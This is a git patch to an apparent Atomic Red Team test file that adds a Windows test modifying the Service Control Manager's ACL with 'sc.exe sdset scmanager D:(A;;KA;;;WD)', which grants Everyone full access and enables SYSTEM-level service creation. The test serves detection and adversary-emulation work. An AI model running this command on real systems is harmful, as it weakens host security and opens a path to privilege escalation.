From efa3370b62fef7affd1a731d6a0f379e983e856c Mon Sep 17 00:00:00 2001
From: abhijose09 <bagchiabhijit09@gmail.com>
Date: Wed, 15 May 2024 06:23:45 +0530
Subject: [PATCH] Update T1569.002.yaml (#2776)

* Update T1569.002.yaml

Added new test Modifying ACL of Service Control Manager via SDET

* correction

---------

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
Co-authored-by: Hare Sudhan <code@0x6c.dev>
---
 atomics/T1569.002/T1569.002.yaml | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml
index 23f4c35d..b39d6c20 100644
--- a/atomics/T1569.002/T1569.002.yaml
+++ b/atomics/T1569.002/T1569.002.yaml
@@ -194,4 +194,15 @@ atomic_tests:
     cleanup_command: |
       sc.exe delete "WerFaultSvc"
     name: command_prompt
-    elevation_required: true
\ No newline at end of file
+    elevation_required: true
+- name: Modifying ACL of Service Control Manager via SDET
+  description: |
+    Modify permissions of Service Control Manager via SDSET. This allows any administrative user to escalate privilege and create a service with SYSTEM level privileges.Restart is required.
+    [Blog](https://0xv1n.github.io/posts/scmanager/)  
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      sc.exe sdset scmanager D:(A;;KA;;;WD)
+    name: command_prompt
+    elevation_required: true